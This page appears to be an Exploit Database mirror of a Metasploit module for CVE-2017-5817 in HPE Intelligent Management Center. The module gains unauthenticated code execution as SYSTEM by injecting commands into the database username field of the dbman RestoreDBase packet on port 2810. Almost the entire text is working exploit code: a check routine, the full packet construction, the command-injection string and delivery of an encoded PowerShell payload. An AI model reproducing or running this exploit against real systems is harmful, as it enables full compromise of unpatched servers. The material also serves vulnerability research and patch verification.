HPE iMC – dbman ‘RestoreDBase’ Remote Command Execution (Metasploit)

Exploit Database
114 阅读

作者： Metasploit

日期： 2018-01-10
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/43492/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

include Msf::Exploit::Powershell

def initialize(info = {})

super(update_info(info,

'Name' => 'HPE iMC dbman RestoreDBase Unauthenticated RCE',

'Description'=> %q{

This module exploits a remote command execution vulnerablity in

Hewlett Packard Enterprise Intelligent Management Center before

version 7.3 E0504P04.

The dbman service allows unauthenticated remote users to restore

a user-specified database (OpCode 10007), however the database

connection username is not sanitized resulting in command injection,

allowing execution of arbitrary operating system commands as SYSTEM.

This service listens on TCP port 2810 by default.

This module has been tested successfully on iMC PLAT v7.2 (E0403)

on Windows 7 SP1 (EN).

'License'=> MSF_LICENSE,

'Author' =>

[

'sztivi', # Discovery

'Chris Lyne', # Python PoC (@lynerc)

'Brendan Coles <bcoles[at]gmail.com>' # Metasploit

'References' =>

[

['CVE', '2017-5817'],

['EDB', '43195'],

['ZDI', '17-341'],

['URL', 'https://www.securityfocus.com/bid/98469/info'],

['URL', 'https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us']

'Platform' => 'win',

'Targets'=> [['Automatic', {}]],

'Payload'=> { 'BadChars' => "\x00" },

'DefaultOptions' => { 'WfsDelay' => 15 },

'Privileged' => true,

'DisclosureDate' => 'May 15 2017',

'DefaultTarget'=> 0))

register_options [Opt::RPORT(2810)]

end

def check

# empty RestoreDBase packet

pkt = [10007].pack('N')

connect

sock.put pkt

res = sock.get_once

disconnect

# Expected reply:

# "\x00\x00\x00\x01\x00\x00\x00:08\x02\x01\xFF\x043Dbman deal msg error, please to see dbman_debug.log"

return CheckCode::Detected if res =~ /dbman/i

CheckCode::Safe

end

def dbman_msg(database_user)

data = ''

db_ip = "#{rand(255)}.#{rand(255)}.#{rand(255)}.#{rand(255)}"

database_type = "\x03" # MySQL

restore_type = 'MANUAL'

database_password = rand_text_alpha rand(1..5)

database_port = rand_text_alpha rand(1..5)

database_instance = rand_text_alpha rand(1..5)

junk = rand_text_alpha rand(1..5)

# database ip

data << "\x04"

data << [db_ip.length].pack('C')

data << db_ip

# ???

data << "\x04"

data << [junk.length].pack('C')

data << junk

# ???

data << "\x04"

data << [junk.length].pack('C')

data << junk

# junk

data << "\x04"

data << [junk.length].pack('C')

data << junk

# ???

data << "\x02\x01\x01"

# database type

data << "\x02"

data << [database_type.length].pack('C')

data << database_type

# restore type

data << "\x04"

data << [restore_type.length].pack('C')

data << restore_type

# ???

data << "\x04"

data << [junk.length].pack('C')

data << junk

# database user

data << "\x04"

data << "\x82"

data << [database_user.length].pack('n')

data << database_user

# database password

data << "\x04"

data << [database_password.length].pack('C')

data << database_password

# database port

data << "\x04"

data << [database_port.length].pack('C')

data << database_port

# database instance

data << "\x04"

data << [database_instance.length].pack('C')

data << database_instance

# ???

data << "\x04"

data << [junk.length].pack('C')

data << junk

# ???

data << "\x04"

data << [junk.length].pack('C')

data << junk

# ???

data << "\x04"

data << [junk.length].pack('C')

data << junk

# ???

data << "\x04"

data << [junk.length].pack('C')

data << junk

# ???

data << "\x30\x00"

data << "\x02\x01\x01"

data

end

def dbman_restoredbase_pkt(database_user)

data = dbman_msg database_user

# opcode 10007 (RestoreDBase)

pkt = [10007].pack('N')

# packet length

pkt << "\x00\x00"

pkt << [data.length + 4].pack('n')

# packet data length

pkt << "\x30\x82"

pkt << [data.length].pack('n')

# packet data

pkt << data

pkt

end

def execute_command(cmd, _opts = {})

connect

sock.put dbman_restoredbase_pkt "\"& #{cmd} &"

disconnect

end

def exploit

command = cmd_psh_payload(

payload.encoded,

payload_instance.arch.first,

{ :remove_comspec => true, :encode_final_payload => true }

)

if command.length > 8000

fail_with Failure::BadConfig, "#{peer} - The selected payload is too long to execute through Powershell in one command"

end

print_status "Sending payload (#{command.length} bytes)..."

execute_command command

end